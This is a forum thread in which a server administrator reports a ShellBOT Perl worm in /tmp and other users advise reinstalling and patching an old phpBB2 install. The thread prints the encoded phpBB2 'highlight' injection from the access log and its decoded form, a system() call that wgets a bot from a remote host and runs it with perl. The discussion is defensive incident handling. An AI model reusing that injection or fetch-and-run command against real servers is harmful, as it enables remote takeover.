# I have got this warms, ShellBOT, attacking my Apache 1.3

## Idler921

It located at /tmp/.bot, there are two file headed with 

```
#

#  ShellBOT

#              0ldW0lf - old-wolf@zipmail.com

#                      - www.atrix-br.cjb.net

#                      - www.atrix.cjb.net

#

#

# isso eh meu B0tchZ reformulado

#

###############################

#  killah... vai c ferrah :)  #

###############################

```

```

# ASW worm 7nd modification - MyPrettyWorm.perl !

# Created ( riped ) by br0k3d@gmail.com

# Fuckz google ! Fuckz MSN ! Fuckz Fotolog.net

```

----------

## dannycool

Wipe, reinstall.

----------

## Idler921

 *dannycool wrote:*   

> Wipe, reinstall.

 Is there any other method to deal with this. I don't want to stop the server.  :Rolling Eyes: 

Thanks

----------

## zerojay

Take the box offline, find out how you were compromised, wipe the box completely clean, reinstall and be sure to protect against the way you were compromised.

----------

## Idler921

I've chmod the /tmp/.bof file to 000.

I think not only the system's file infracted, as I can see these continuous error message in my apache's error_log.

 *Quote:*   

> 
> 
> Can't open perl script "/tmp/.bof/.bot": Permission denied
> 
> /tmp/.bof/.bot: Permission denied
> ...

 

I use clamav scan my document root and found nothing.

----------

## zerojay

You can't trust anything running on the machine at the moment, plain and simple. It's very possible that the damage has been done and rootkits have been installed with root shells available to anyone and hidden from view. Don't bother trying to fix it. Just learn your lesson and start with a fresh slate.

----------

## Idler921

 *Quote:*   

> /phpBB2/viewtopic.php?p=82&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101)%252Echr(116)%
> 
> 252Echr(32)%252Echr(102)%252Echr(114)%252Echr(97)%252Echr(103)%252Echr(46)%252Echr(112)%252Echr(114)%252Echr(111)%252Echr(46)%252Echr(9%252Echr(114)%252E
> 
> chr(47)%252Echr(100)%252Echr(101)%252Echr(97)%252Echr(100)%252Echr(99)%252Echr(111)%252Echr(119)%252Echr(47)%252Echr(9%252Echr(111)%252Echr(116)%252Echr(
> ...

 

this log was found from an old dated unused phpBB2 forum  :Evil or Very Mad: 

to resolve it, it become

 *Quote:*   

> system("wget frag.pro.br/deadcow/bot -O /tmp/.bof/.bot;perl /tmp/.bof/.bot;touch /tmp/.bset")

 

so. I think I've found and kill the source by rm -rf phpBB2.

I hope there's no other security hole......

----------

## kimchi_sg

 *Idler921 wrote:*   

> so. I think I've found and kill the source by rm -rf phpBB2.
> 
> I hope there's no other security hole......

 

"I think" and "I hope" cannot be in a server administrator's vocabulary, as far as system integrity is concerned. You have to be absolutely and totally sure about it, and that is why I say:

There is no substitute for a re-install at this point.

----------

## Chris W

My sympathies Idler921, but I concur with the other advice.  The only way to clean the machine with any certainty is to reinstall.  You cannot trust anything on the machine any longer including any distfiles you might have cached (i.e. don't use these when rebuilding).

----------

## Idler921

I see

then let's do it

----------

## transient

That is a PHP exploit that was doing the rounds a while ago. 

And please please update to apache 2.x -_-

----------

## xbmodder

i am rolling on the floor laughing

----------

## Pink

 *xbmodder wrote:*   

> i am rolling on the floor laughing

 

Umm, why?

----------

## AndCycle

 *transient wrote:*   

> That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_-

 

I don't think so, I just got one today with apache 2.0.54/php 4.3.11,

it just a exploit by old phpbb.

 *Quote:*   

> #############################################################
> 
> #   Developed by br0k3d                                     #
> 
> #   For educational purpose only                            #
> ...

 

----------

## u238

 *AndCycle wrote:*   

>  *transient wrote:*   That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_- 
> 
> I don't think so, I just got one today with apache 2.0.54/php 4.3.11,
> ...

 

where did you find this exploit? It could be interresting to study it...!

----------

## ter_roshak

 *u238 wrote:*   

>  *AndCycle wrote:*    *transient wrote:*   That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_- 
> 
> I don't think so, I just got one today with apache 2.0.54/php 4.3.11,
> ...

 

Just install a vulnerable version of phpBB and wait a few hours, you'll have your very own copy to study.

----------

## corley

ERmm.. well fromm what I've read that is about any phpBB version. If you are running phpBB you definately need to check their site regularly for updates.

 *ter_roshak wrote:*   

>  *u238 wrote:*    *AndCycle wrote:*    *transient wrote:*   That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_- 
> 
> I don't think so, I just got one today with apache 2.0.54/php 4.3.11,
> ...

 

----------

## rex123

I'm coming in really late on this, but I want to make a point I've made before...

I don't think it's necessary to reinstall the whole system just because an apache process has managed to write a file to /tmp.

/tmp is world-writable, so a process with amazingly few permissions (like apache) can write to it.

Internet worms try to take advantage of this by writing to /tmp and then executing the file, which is normally a perl script that tries to send itself to other machines. This is *not* a sign of a rootkit. It really isn't.

 *Idler921 wrote:*   

> I've chmod the /tmp/.bof file to 000.
> 
> I think not only the system's file infracted, as I can see these continuous error message in my apache's error_log.
> 
>  *Quote:*   
> ...

 

In this case, it didn't even manage to execute, so it was a dead end for the worm.

Yes, upgrade phpBB - or remove it. But don't give in to all the paranoia, fear, uncertainty and doubt unless it's waranted.

----------

